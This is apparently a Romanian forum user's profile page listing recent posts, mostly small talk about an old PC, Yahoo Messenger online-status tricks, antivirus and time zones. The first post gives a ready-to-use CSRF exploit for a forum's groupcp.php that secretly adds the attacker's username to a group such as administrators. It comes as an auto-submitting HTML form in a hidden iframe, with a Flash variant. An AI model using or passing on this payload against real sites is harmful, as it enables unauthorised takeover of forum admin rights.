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Sylver Cheetah 53

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  • Occupation
    Dreamin' within a dream...
  • Interests
    Space, the final frontier
  • Biography
  • Location
    Milky Way

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Newbie (1/14)



  1. Acest CSRF adauga un utilizator la un grup (de exemplu, grupul administratorilor). Html Exploit By Vincy: <html> <iframe name="hackinginside" frameborder="0" height="0" width="0"></iframe> <form action="http://site.com/path/groupcp.php?g=[GROUP_ID]" method="post" name="vincy" target="hackinginside"> <input type="hidden" name="username" value="[YOUR_NAME]"> <input type="submit" name="add" value="Add Member"></form> <script>document.vincy.submit()</script> </html> Flash Exploit By Nexen: var username:String = "[YOUR_NAME]"; var add:String = "Add Member"; var g:String = "[GROUP_ID]"; getURL("http://site.com/path/groupcp.php?g=[GROUP_ID]", "_self", "POST");
  2. AMD Duron 950 Mhz. Sad but true...
  3. Nu-mi dau seama dacã mã ajutã, cã la cei 256mb ai mei... n-are cum sã meargã bine orice i-aº face.
  4. Nu merge dacã omul a debifat allow yahoo websites to show when I'm online.
  5. Ehe. Primul meu pc. Cîte amintiri. 950Mhz, hdd 20gb, 256 ddram. By the way. Primul e ºi ultimul, deocamdatã.
  6. Cu ce soft se pot descãrca pozele din acest telefon?
  7. Încarci Doodle (programul de desen) ºi dacã merge, omul e online. Dacã apare waiting for your buddy to load Doodle, nu e online.
  8. Folosesc Kaspersky Internet Security de ceva vreme ºi n-am probleme.
  9. Acum nu mai exista decit administrator ºi moderator.
  10. Poþi modifica de la profil ora. Acum de ex., tb. sã fie GMT+2. Alteori, va fi GMT+3.
  11. Tocmai a zis omu' cã e închis momentan.
  12. La fel gîndesc ºi eu. Dar daca faceti asa ceva, mai este ethical hacking? No offence, dar unii ar putea-o considera simplã rãzbunare infantilã. Eu aº interpreta-o drept o binemeritatã corecþie...
  13. Interesantã ideea conferinþelor pe Yahoo. Mai ales cã puþini mai folosesc mIRC ºi pe bunã dreptate.
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